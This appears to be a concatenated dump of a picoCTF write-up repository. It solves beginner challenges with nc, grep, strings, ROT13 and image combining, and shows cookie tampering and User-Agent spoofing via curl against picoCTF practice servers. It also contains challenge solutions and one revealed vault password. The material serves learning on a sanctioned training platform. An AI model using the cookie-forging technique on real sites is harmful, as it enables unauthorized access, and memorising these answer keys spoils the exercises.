| ``` 36 | 37 | ### Convert with bc 38 | 39 | Alternatively, we can use the tool `bc` to do the convertion. Install it with `sudo apt install bc` if it isn't installed already. 40 | ```bash 41 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up] 42 | └─$ echo "ibase=16; 3D" | bc 43 | 61 44 | ``` 45 | In this case you need to construct the complete flag manually. 46 | 47 | ### Convert directly in bash 48 | 49 | Finally, we can convert directly in bash 50 | ```bash 51 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Warmed_Up] 52 | └─$ echo $((16#3d)) 53 | 61 54 | ``` 55 | As before, you need to construct the complete flag manually in this case. 56 | 57 | For additional information, please see the references below. 58 | 59 | ## References 60 | 61 | - [Wikipedia - Hexadecimal](https://en.wikipedia.org/wiki/Hexadecimal) 62 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/plumbing.md: -------------------------------------------------------------------------------- 1 | # plumbing 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 200 10 | Tags: picoCTF 2019, General Skills 11 | Author: ALEX FULTON/DANNY TUNITIS 12 | 13 | Description: 14 | Sometimes you need to handle process data outside of a file. 15 | 16 | Can you find a way to keep the output from this program and search for the flag? 17 | 18 | Connect to jupiter.challenges.picoctf.org 7480. 19 | 20 | Hints: 21 | 1. Remember the flag format is picoCTF{XXXX} 22 | 2. What's a pipe? No not that kind of pipe... This kind 23 | ``` 24 | Challenge link: [https://play.picoctf.org/practice/challenge/48](https://play.picoctf.org/practice/challenge/48) 25 | 26 | ## Solution 27 | 28 | Let's connect to the server with `nc` and see what we get 29 | ```bash 30 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Plumbing] 31 | └─$ nc jupiter.challenges.picoctf.org 7480 32 | Not a flag either 33 | Again, I really don't think this is a flag 34 | I don't think this is a flag either 35 | This is defintely not a flag 36 | Again, I really don't think this is a flag 37 | Not a flag either 38 | I don't think this is a flag either 39 | Again, I really don't think this is a flag 40 | Again, I really don't think this is a flag 41 | This is defintely not a flag 42 | This is defintely not a flag 43 | This is defintely not a flag 44 | This is defintely not a flag 45 | Not a flag either 46 | Again, I really don't think this is a flag 47 | Not a flag either 48 | <---snip---> 49 | ``` 50 | 51 | OK, too much output. Lets `grep` for the flag 52 | ```bash 53 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Plumbing] 54 | └─$ nc jupiter.challenges.picoctf.org 7480 | grep picoCTF 55 | picoCTF{} 56 | ``` 57 | 58 | And there we have the flag. 59 | 60 | For additional information, please see the references below. 61 | 62 | ## References 63 | 64 | - [Pipes: A Brief Introduction](http://www.linfo.org/pipes.html) 65 | - [grep(1) - Linux man page](https://linux.die.net/man/1/grep) 66 | - [nc(1) - Linux man page](https://linux.die.net/man/1/nc) 67 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/strings_it.md: -------------------------------------------------------------------------------- 1 | # strings it 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY TUNITIS 12 | 13 | Description: 14 | Can you find the flag in file without running it? 15 | 16 | Hints: 17 | 1. strings 18 | ``` 19 | Challenge link: [https://play.picoctf.org/practice/challenge/37](https://play.picoctf.org/practice/challenge/37) 20 | 21 | ## Solution 22 | 23 | This is basically a tutorial to usage of `strings` and `grep` 24 | ```bash 25 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/Strings_it] 26 | └─$ strings -n 8 strings | grep picoCTF 27 | picoCTF{} 28 | ``` 29 | 30 | For additional information, please see the references below. 31 | 32 | ## References 33 | 34 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 35 | - [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html) 36 | -------------------------------------------------------------------------------- /picoCTF_2019/General_Skills/whats_a_net_cat.md: -------------------------------------------------------------------------------- 1 | # what's a net cat? 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, General Skills 11 | Author: SANJAY C/DANNY TUNITIS 12 | 13 | Description: 14 | Using netcat (nc) is going to be pretty important. 15 | 16 | Can you connect to jupiter.challenges.picoctf.org at port 64287 to get the flag? 17 | 18 | Hints: 19 | 1. nc tutorial 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/34](https://play.picoctf.org/practice/challenge/34) 22 | 23 | ## Solution 24 | 25 | This is basically a tutorial in the basic usage of `nc` 26 | ```bash 27 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/General_Skills/What's_a_net_cat] 28 | └─$ nc jupiter.challenges.picoctf.org 64287 29 | You're on your way to becoming the net cat master 30 | picoCTF{} 31 | ``` 32 | 33 | For additional information, please see the references below. 34 | 35 | ## References 36 | 37 | - [nc(1) - Linux man page](https://linux.die.net/man/1/nc) 38 | -------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/Droids0_Emulation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2019/Reverse_Engineering/Droids0_Emulation.png -------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/README.md: -------------------------------------------------------------------------------- 1 | # Reverse Engineering Challenges 2 | 3 | 12 Challenges: 4 | - [asm1](asm1.md) 5 | - [asm2](asm2.md) 6 | - [asm3](asm3.md) 7 | - [droids0](droids0.md) 8 | - [droids1](droids1.md) 9 | - [reverse_cipher](reverse_cipher.md) 10 | - [vault-door-1](vault-door-1.md) 11 | - [vault-door-3](vault-door-3.md) 12 | - [vault-door-4](vault-door-4.md) 13 | - [vault-door-5](vault-door-5.md) 14 | - [vault-door-6](vault-door-6.md) 15 | - [vault-door-training](vault-door-training.md) 16 | -------------------------------------------------------------------------------- /picoCTF_2019/Reverse_Engineering/vault-door-training.md: -------------------------------------------------------------------------------- 1 | # vault-door-training 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solutions](#solutions) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 50 10 | Tags: picoCTF 2019, Reverse Engineering 11 | Author: MARK E. HAASE 12 | 13 | Description: 14 | Your mission is to enter Dr. Evil's laboratory and retrieve the blueprints for his Doomsday Project. 15 | The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer 16 | and requires a password to open. Unfortunately, our undercover agents have not been able to obtain 17 | the secret passwords for the vault doors, but one of our junior agents obtained the source code for 18 | each vault's computer! You will need to read the source code for each level to figure out what the 19 | password is for that vault door. As a warmup, we have created a replica vault in our training facility. 20 | 21 | The source code for the training vault is here: VaultDoorTraining.java 22 | 23 | Hints: 24 | 1. The password is revealed in the program's source code. 25 | ``` 26 | Challenge link: [https://play.picoctf.org/practice/challenge/7](https://play.picoctf.org/practice/challenge/7) 27 | 28 | ## Solutions 29 | 30 | The source code looks like this 31 | ```java 32 | import java.util.*; 33 | 34 | class VaultDoorTraining { 35 | public static void main(String args[]) { 36 | VaultDoorTraining vaultDoor = new VaultDoorTraining(); 37 | Scanner scanner = new Scanner(System.in); 38 | System.out.print("Enter vault password: "); 39 | String userInput = scanner.next(); 40 | String input = userInput.substring("picoCTF{".length(),userInput.length()-1); 41 | if (vaultDoor.checkPassword(input)) { 42 | System.out.println("Access granted."); 43 | } else { 44 | System.out.println("Access denied!"); 45 | } 46 | } 47 | 48 | // The password is below. Is it safe to put the password in the source code? 49 | // What if somebody stole our source code? Then they would know what our 50 | // password is. Hmm... I will think of some ways to improve the security 51 | // on the other doors. 52 | // 53 | // -Minion #9567 54 | public boolean checkPassword(String password) { 55 | return password.equals("w4rm1ng_Up_w1tH_jAv4_eec0716b713"); 56 | } 57 | } 58 | ``` 59 | 60 | We see that a [substring](https://www.javatpoint.com/java-string-substring) of the `userInput` is extracted and later compared with [equals](https://www.javatpoint.com/java-string-equals) in the `checkPassword` method where most of the flag is visible in plain text. 61 | 62 | For additional information, please see the references below. 63 | 64 | ## References 65 | 66 | - [Java String substring()](https://www.javatpoint.com/java-string-substring) 67 | - [Java String equals()](https://www.javatpoint.com/java-string-equals) 68 | -------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/Network_conditions_tab_in_DevTools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2019/Web_Exploitation/Network_conditions_tab_in_DevTools.png -------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Web Exploitation Challenges 2 | 3 | 8 Challenges: 4 | - [Client-side-again](Client-side-again.md) 5 | - [dont-use-client-side](dont-use-client-side.md) 6 | - [Insp3ct0r](Insp3ct0r.md) 7 | - [Irish-Name-Repo 1](Irish-Name-Repo_1.md) 8 | - [Irish-Name-Repo 2](Irish-Name-Repo_2.md) 9 | - [logon](logon.md) 10 | - [picobrowser](picobrowser.md) 11 | - [where are the robots](where_are_the_robots.md) 12 | -------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/logon.md: -------------------------------------------------------------------------------- 1 | # logon 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, Web Exploitation 11 | Author: BOBSON 12 | 13 | Description: 14 | The factory is hiding things from all of its users. Can you login as Joe and find what they've been looking at? 15 | 16 | https://jupiter.challenges.picoctf.org/problem/13594/ or http://jupiter.challenges.picoctf.org:13594 17 | 18 | Hints: 19 | 1. Hmm it doesn't seem to check anyone's password, except for Joe's? 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/46](https://play.picoctf.org/practice/challenge/46) 22 | 23 | ## Solution 24 | 25 | The hint suggests that there is another authentication mechanism than passwords used. 26 | 27 | But let's browse to the web site and try to login with username `Joe` and password `Joe` anyway. 28 | The message displayed is `I'm sorry Joe's password is super secure. You're not getting in that way.` which again tells us that this is not a question about finding Joe's password. 29 | 30 | Let's try to login with username `admin` and password `admin` instead. 31 | The message displayed now is `Success: You logged in! Not sure you'll be able to see the flag though`. 32 | 33 | Let's check for authentication [cookies](https://en.wikipedia.org/wiki/HTTP_cookie). 34 | Press F12 to open DevTools and go to the `Application` tab. 35 | Under `Storage` and then `Cookies` select the web site. 36 | Note that there is three cookies: 37 | * A cookie named `admin` with the value `False` 38 | * A cookie named `username` with the value `admin` 39 | * A cookie named `password` with the value `admin` 40 | 41 | Edit the `admin` cookie's value and set it to `True` and then reload the web page (press F5). 42 | Now the web page displays the flag. 43 | 44 | If you want to automate the retrieval of the flag you can use `curl` like this 45 | ```bash 46 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Logon] 47 | └─$ curl -s -L --cookie admin=True http://jupiter.challenges.picoctf.org:13594/flag | grep -oE 'picoCTF{.*}' 48 | picoCTF{} 49 | ``` 50 | 51 | For additional information, please see the references below. 52 | 53 | ## References 54 | 55 | - [Wikipedia - HTTP cookie](https://en.wikipedia.org/wiki/HTTP_cookie) 56 | - [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html) 57 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 58 | -------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/picobrowser.md: -------------------------------------------------------------------------------- 1 | # picobrowser 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 200 10 | Tags: picoCTF 2019, Web Exploitation 11 | Author: ARCHIT 12 | 13 | Description: 14 | This website can be rendered only by picobrowser, go and catch the flag! 15 | 16 | https://jupiter.challenges.picoctf.org/problem/26704/ or http://jupiter.challenges.picoctf.org:26704 17 | 18 | Hints: 19 | 1. You don't need to download a new web browser 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/9](https://play.picoctf.org/practice/challenge/9) 22 | 23 | ## Solution 24 | 25 | Browsing to the website you see a big `Flag` button that sends you to `/flag` and displays the message `You're not picobrowser!`. 26 | We have the wrong [user-agent header](https://en.wikipedia.org/wiki/User-Agent_header). 27 | 28 | ### Curl solution 29 | 30 | The user-agent is easiest changed with `curl`. Then we can just `grep` for the flag 31 | ```bash 32 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Picobrowser] 33 | └─$ curl -s -A picobrowser http://jupiter.challenges.picoctf.org:26704/flag | grep -oE 'picoCTF{.*}' 34 | picoCTF{} 35 | ``` 36 | 37 | ### DevTools solution 38 | 39 | An alternative solution is to use your browsers DevTools. 40 | 41 | Press F12 to open DevTools and then click on the three dots-button in the upper right corner of DevTools. 42 | Select `More Tools` in the popup-menu and then select `Network conditions`. 43 | A new section with the `Network conditions` tab selected opens up in the lower part of DevTools. 44 | In the `User agent` part, deselect the `Use browser default` checkbox. Enter `picobrowser` in the textbox. 45 | 46 | ![Network conditions tab in DevTools](Network_conditions_tab_in_DevTools.png) 47 | 48 | Reload the web page by pressing `F5` and the flag is shown. 49 | 50 | For additional information, please see the references below. 51 | 52 | ## References 53 | 54 | - [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html) 55 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 56 | - [Wikipedia - User-Agent header](https://en.wikipedia.org/wiki/User-Agent_header) 57 | -------------------------------------------------------------------------------- /picoCTF_2019/Web_Exploitation/where_are_the_robots.md: -------------------------------------------------------------------------------- 1 | # where are the robots 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2019, Web Exploitation 11 | Author: ZARATEC/DANNY 12 | 13 | Description: 14 | Can you find the robots? 15 | https://jupiter.challenges.picoctf.org/problem/36474/ or http://jupiter.challenges.picoctf.org:36474 16 | 17 | Hints: 18 | 1. What part of the website could tell you where the creator doesn't want you to look? 19 | ``` 20 | Challenge link: [https://play.picoctf.org/practice/challenge/4](https://play.picoctf.org/practice/challenge/4) 21 | 22 | ## Solution 23 | 24 | The name of the challenge and the hint suggests that we should check the [robots.txt](https://en.wikipedia.org/wiki/Robots.txt) file. 25 | 26 | We can use `curl` for this 27 | ```bash 28 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Where_are_the_robots] 29 | └─$ curl http://jupiter.challenges.picoctf.org:36474/robots.txt 30 | User-agent: * 31 | Disallow: /477ce.html 32 | ``` 33 | 34 | Ah, a web page that the site owner doesn't want search engines to include. 35 | 36 | Let's retrieve it in silent mode (-s) and `grep` for the flag 37 | ```bash 38 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2019/Web_Exploitation/Where_are_the_robots] 39 | └─$ curl -s http://jupiter.challenges.picoctf.org:36474/477ce.html | grep -oE 'picoCTF{.*}' 40 | picoCTF{} 41 | ``` 42 | 43 | And there we have the flag. 44 | 45 | For additional information, please see the references below. 46 | 47 | ## References 48 | 49 | - [curl - Linux manual page](https://man7.org/linux/man-pages/man1/curl.1.html) 50 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 51 | - [Wikipedia - robots.txt](https://en.wikipedia.org/wiki/Robots.txt) 52 | -------------------------------------------------------------------------------- /picoCTF_2020/README.md: -------------------------------------------------------------------------------- 1 | # picoCTF 2020 Mini-Competition 2 | 3 | ## Forensics Challenges 4 | 5 | 1 Challenge: 6 | - [Pitter, Patter, Platters](Forensics/Pitter_Patter_Platters.md) 7 | 8 | ## Web Exploitation Challenges 9 | 10 | 1 Challenge: 11 | - [Web Gauntlet](Web_Exploitation/Web_Gauntlet.md) 12 | -------------------------------------------------------------------------------- /picoCTF_2021/Binary_Exploitation/README.md: -------------------------------------------------------------------------------- 1 | # Binary Exploitation Challenges 2 | 3 | 2 Challenges: 4 | - [Here's a LIBC](Heres_a_LIBC.md) 5 | - [Stonks](Stonks.md) 6 | -------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/Mod_26.md: -------------------------------------------------------------------------------- 1 | # Mod 26 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 10 10 | Tags: picoCTF 2021, Cryptography 11 | Author: PANDU 12 | 13 | Description: 14 | Cryptography can be easy, do you know what ROT13 is? 15 | 16 | cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX} 17 | 18 | Hints: 19 | 1. This can be solved online if you don't want to do it by hand! 20 | ``` 21 | Challenge link: [https://play.picoctf.org/practice/challenge/144](https://play.picoctf.org/practice/challenge/144) 22 | 23 | ## Solution 24 | 25 | There are several ways to solve this challenge and here are some of them. 26 | 27 | ### CyberChef solution 28 | 29 | As the hint suggested you can use an online site such as [CyberChef](https://gchq.github.io/CyberChef/) and use the 'ROT13' recipe. 30 | 31 | Enter 'rot13' in the `Operations` search bar, then drag and drop it to the `Recipe`. 32 | Copy the scrambled flag to the `Input` pane and press `BAKE`. 33 | 34 | ### Use a rot13 commandline tool in Linux 35 | 36 | There are at least two sets of packages that contains prepacked `rot13` tools: 37 | * [hxtools](https://manpages.debian.org/testing/hxtools/hxtools.7.en.html) 38 | * [bsdgames](https://wiki.linuxquestions.org/wiki/BSD_games) 39 | 40 | Install them with either `sudo apt install hxtools` or `sudo apt install bsdgames`. 41 | 42 | The tool from `hxtools` installs as `/usr/bin/rot13` and is a script that invokes the `tr` command more or less as described below. 43 | 44 | The tool from `bsdgames` installs as `/usr/games/rot13` and calls the `caesar` tool (which is also included in the package) but with a rotation of 13. 45 | 46 | After one of these tools have been installed you can run 47 | ```bash 48 | ┌──(kali㉿kali)-[~] 49 | └─$ echo "cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}" | rot13 50 | picoCTF{next_time_} 51 | ``` 52 | 53 | ### Use the tr tool in Linux 54 | 55 | Alternatively, you can use the `tr` tool to "manually" do the decoding 56 | ```bash 57 | ┌──(kali㉿kali)-[~] 58 | └─$ echo "cvpbPGS{arkg_gvzr_V'yy_gel_2_ebhaqf_bs_ebg13_GYpXOHqX}" | tr 'A-Za-z' 'N-ZA-Mn-za-m' 59 | picoCTF{next_time_} 60 | ``` 61 | 62 | For additional information, please see the references below. 63 | 64 | ## References 65 | 66 | - [Wikipedia - Modulo](https://en.wikipedia.org/wiki/Modulo) 67 | - [Wikipedia - ROT13](https://en.wikipedia.org/wiki/ROT13) 68 | -------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/Pixelated.md: -------------------------------------------------------------------------------- 1 | # Pixelated 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 100 10 | Tags: picoCTF 2021, Cryptography 11 | Author: SARA 12 | 13 | Description: 14 | I have these 2 images, can you make a flag out of them? 15 | 16 | scrambled1.png scrambled2.png 17 | 18 | Hints: 19 | 1. https://en.wikipedia.org/wiki/Visual_cryptography 20 | 2. Think of different ways you can "stack" images 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/100](https://play.picoctf.org/practice/challenge/100) 23 | 24 | ## Solution 25 | 26 | There are several ways to solve this challenge and here are two of them. 27 | 28 | ### Stegsolve solution 29 | 30 | You can use [StegSolve](https://github.com/Giotino/stegsolve) to combine the pictures. However, I never got the current 1.4 version to work and used the former [1.3 version](http://www.caesum.com/handbook/stego.htm) instead. 31 | 32 | In StegSolve 1.3, open the `scrambled1.png` file. Then, in the `Analyse`-menu select `Image Combiner` and select the `scrambled2.png` file. A new window opens where you can step through various ways to combine the images: XOR, OR, AND, ADD, SUB, etc. 33 | 34 | You will find the flag with the `ADD`-method. 35 | 36 | ### Write a Python script 37 | 38 | An alternative way to solve this challenge is to write a Python script with the help of the [Python Imaging Library - Pillow](https://pypi.org/project/Pillow/) and [numpy](https://pypi.org/project/numpy/) 39 | ```python 40 | #!/usr/bin/python 41 | 42 | from PIL import Image 43 | from numpy import array 44 | 45 | image1 = Image.open('scrambled1.png') 46 | image2 = Image.open('scrambled2.png') 47 | 48 | # Convert to arrays 49 | array1 = array(image1) 50 | array2 = array(image2) 51 | 52 | # Combine/add the images 53 | result = array1 + array2 54 | 55 | # Save the result 56 | Image.fromarray(result).save('flag.png') 57 | print("Result saved as flag.png") 58 | ``` 59 | 60 | Then we run the script to combine the images 61 | ```bash 62 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Cryptography/Pixelated] 63 | └─$ ~/python_venvs/Pillow/bin/python pixelaated.py 64 | Result saved as flag.png 65 | ``` 66 | 67 | Finally, use `eog` or `feh` to view the `flag.png` image to get the flag. 68 | 69 | For additional information, please see the references below. 70 | 71 | ## References 72 | 73 | - [Wikipedia - Visual cryptography](https://en.wikipedia.org/wiki/Visual_cryptography) 74 | -------------------------------------------------------------------------------- /picoCTF_2021/Cryptography/README.md: -------------------------------------------------------------------------------- 1 | # Cryptography Challenges 2 | 3 | 9 Challenges: 4 | - [Dachshund Attacks](Dachshund_Attacks.md) 5 | - [Easy Peasy](Easy_Peasy.md) 6 | - [Mind your Ps and Qs](Mind_your_Ps_and_Qs.md) 7 | - [Mini RSA](Mini_RSA.md) 8 | - [Mod 26](Mod_26.md) 9 | - [New Caesar](New_Caesar.md) 10 | - [No Padding, No Problem](No_Padding_No_Problem.md) 11 | - [Pixelated](Pixelated.md) 12 | - [Play Nice](Play_Nice.md) 13 | -------------------------------------------------------------------------------- /picoCTF_2021/Forensics/Booting_disk_in_Qemu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cajac/picoCTF-Writeups/9c46923d83fc95b5aa66e7e41df3b163bc512fee/picoCTF_2021/Forensics/Booting_disk_in_Qemu.png -------------------------------------------------------------------------------- /picoCTF_2021/Forensics/Disk_disk_sleuth.md: -------------------------------------------------------------------------------- 1 | # Disk, disk, sleuth! 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 110 10 | Tags: picoCTF 2021, Forensics 11 | Author: SYREAL 12 | 13 | Description: 14 | Use `srch_strings` from the sleuthkit and some terminal-fu to find a flag in this disk image: 15 | dds1-alpine.flag.img.gz 16 | 17 | Hints: 18 | 1. Have you ever used `file` to determine what a file was? 19 | 2. Relevant terminal-fu in picoGym: https://play.picoctf.org/practice/challenge/85 20 | 3. Mastering this terminal-fu would enable you to find the flag in a single command: 21 | https://play.picoctf.org/practice/challenge/48 22 | 4. Using your own computer, you could use qemu to boot from this disk! 23 | ``` 24 | Challenge link: [https://play.picoctf.org/practice/challenge/113](https://play.picoctf.org/practice/challenge/113) 25 | 26 | ## Solution 27 | 28 | Let's start with unpacking the given file 29 | ```bash 30 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth] 31 | └─$ gunzip dds1-alpine.flag.img.gz 32 | gzip: dds1-alpine.flag.img: Value too large for defined data type 33 | 34 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth] 35 | └─$ file dds1-alpine.flag.img 36 | dds1-alpine.flag.img: DOS/MBR boot sector; partition 1 : ID=0x83, active, start-CHS (0x0,32,33), end-CHS (0x10,81,1), startsector 2048, 260096 sectors 37 | ``` 38 | 39 | So we have a disk image with a MBR boot sector and one partition. 40 | 41 | Let's search for strings in the image with either `srch_strings` or `strings` 42 | ```bash 43 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth] 44 | └─$ strings -n 8 dds1-alpine.flag.img | grep -oE 'picoCTF{.*}' 45 | picoCTF{} 46 | 47 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/Forensics/Disk_disk_sleuth] 48 | └─$ srch_strings dds1-alpine.flag.img | grep -oE 'picoCTF{.*}' 49 | picoCTF{} 50 | ``` 51 | 52 | Both seem to work equally well and find the flag. 53 | 54 | For additional information, please see the references below. 55 | 56 | ## References 57 | 58 | - [grep - Linux manual page](https://man7.org/linux/man-pages/man1/grep.1.html) 59 | - [strings - Linux manual page](https://man7.org/linux/man-pages/man1/strings.1.html) 60 | - [Wikipedia - String (computer science)](https://en.wikipedia.org/wiki/String_(computer_science)) 61 | -------------------------------------------------------------------------------- /picoCTF_2021/Forensics/README.md: -------------------------------------------------------------------------------- 1 | # Forensics Challenges 2 | 3 | 11 Challenges: 4 | - [Disk, disk, sleuth!](Disk_disk_sleuth.md) 5 | - [Disk, disk, sleuth! II](Disk_disk_sleuth_II.md) 6 | - [information](information.md) 7 | - [MacroHard WeakEdge](MacroHard_WeakEdge.md) 8 | - [Matryoshka doll](Matryoshka_doll.md) 9 | - [Milkslap](Milkslap.md) 10 | - [Surfing the Waves](Surfing_the_Waves.md) 11 | - [Trivial Flag Transfer Protocol](Trivial_Flag_Transfer_Protocol.md) 12 | - [tunn3l v1s10n](tunn3l_v1s10n.md) 13 | - [Wireshark doo dooo do doo...](Wireshark_doo_dooo_do_doo.md) 14 | - [Wireshark twoo twooo two twoo...](Wireshark_twoo_twooo_two_twoo.md) 15 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Obedient_Cat.md: -------------------------------------------------------------------------------- 1 | # Obedient Cat 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 5 10 | Tags: picoCTF 2021, General Skills 11 | Author: SYREAL 12 | 13 | Description: 14 | This file has a flag in plain sight (aka "in-the-clear"). 15 | Download flag. 16 | 17 | Hints: 18 | 1. Any hints about entering a command into the Terminal (such as the next one), will start with 19 | a '$'... everything after the dollar sign will be typed (or copy and pasted) into your Terminal. 20 | 2. To get the file accessible in your shell, enter the following in the Terminal prompt: 21 | $ wget https://mercury.picoctf.net/static/fb851c1858cc762bd4eed569013d7f00/flag 22 | 3. $ man cat 23 | ``` 24 | Challenge link: [https://play.picoctf.org/practice/challenge/147](https://play.picoctf.org/practice/challenge/147) 25 | 26 | ## Solution 27 | 28 | picoCTF is a VERY beginner friendly CTF and this must be one of the easiest challenges ever. 29 | 30 | As suggested in the hints use either `wget` or your browser (Right-click and select Save link as...) to download 31 | the flag file. 32 | 33 | Then use `cat` (on Linux), `type` (on Windows) or any text editor to view the flag. 34 | 35 | For additional information, please see the references below. 36 | 37 | ## References 38 | 39 | - [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html) 40 | - [wget - Linux manual page](https://man7.org/linux/man-pages/man1/wget.1.html) 41 | - [type - Windows Command](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732507(v=ws.11)) 42 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/Python_Wrangling.md: -------------------------------------------------------------------------------- 1 | # Python Wrangling 2 | 3 | - [Challenge information](#challenge-information) 4 | - [Solution](#solution) 5 | - [References](#references) 6 | 7 | ## Challenge information 8 | ``` 9 | Points: 10 10 | Tags: picoCTF 2021, General Skills 11 | Author: SYREAL 12 | 13 | Description: 14 | Python scripts are invoked kind of like programs in the Terminal... 15 | Can you run this Python script using this password to get the flag? 16 | 17 | Hints: 18 | 1. Get the Python script accessible in your shell by entering the following command in the Terminal prompt: 19 | $ wget https://mercury.picoctf.net/static/1b247b1631eb377d9392bfa4871b2eb1/ende.py 20 | 2. $ man python 21 | ``` 22 | Challenge link: [https://play.picoctf.org/practice/challenge/166](https://play.picoctf.org/practice/challenge/166) 23 | 24 | ## Solution 25 | 26 | Given in the challenge are: 27 | * A python script to run 28 | * A file with a password 29 | * A file with an encrypted flag 30 | 31 | Check out the Python script if you like but there is no need for that to solve the challenge. 32 | This challenge is just an exercise in running Python scripts. 33 | 34 | Run the Python script like this 35 | ```bash 36 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling] 37 | └─$ python ende.py 38 | Usage: ende.py (-e/-d) [file] 39 | ``` 40 | 41 | Ah, we need to supply the script with parameters. The `-e` probably stands for encrypt and `-d` for decrypt and we want to decrypt. 42 | 43 | So get the password 44 | ```bash 45 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling] 46 | └─$ cat pw.txt 47 | dbd1bea4dbd1bea4dbd1bea4dbd1bea4 48 | ``` 49 | 50 | And then decrypt the flag 51 | ```bash 52 | ┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2021/General_Skills/Python_Wrangling] 53 | └─$ python ende.py -d flag.txt.en 54 | Please enter the password:dbd1bea4dbd1bea4dbd1bea4dbd1bea4 55 | picoCTF{} 56 | ``` 57 | 58 | And there we have the flag. 59 | 60 | For additional information, please see the references below. 61 | 62 | ## References 63 | 64 | - [cat - Linux manual page](https://man7.org/linux/man-pages/man1/cat.1.html) 65 | - [python - Linux manual page](https://linux.die.net/man/1/python) 66 | -------------------------------------------------------------------------------- /picoCTF_2021/General_Skills/README.md: 